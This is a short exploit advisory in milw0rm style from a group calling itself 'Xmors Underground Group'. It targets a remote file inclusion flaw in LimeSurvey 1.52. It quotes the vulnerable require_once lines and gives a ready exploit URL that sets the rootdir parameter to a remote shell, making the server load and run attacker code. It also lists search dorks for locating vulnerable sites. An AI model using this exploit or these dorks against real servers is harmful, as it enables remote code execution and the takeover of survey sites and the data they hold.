\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : LimeSurvey (PHPSurveyor) 1.52 plus_build 2007.10.16
Download : http://garr.dl.sourceforge.net/sourceforge/limesurvey/limesurvey152plus_build3386_20071016.zip
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
Dork : "You have not provided a survey identification number"
Dork2 : "LimeSurvey"
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
require_once($rootdir.'/classes/php-gettext/gettext.php');
require_once($rootdir.'/classes/php-gettext/streams.php');
+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+
Exploit :
http://[TARGET]/[PATH]/classes/core/language.php?rootdir=[-Sh3ll-]
+---------------------------------------------------------------------------------------------+
# milw0rm.com [2007-10-17]
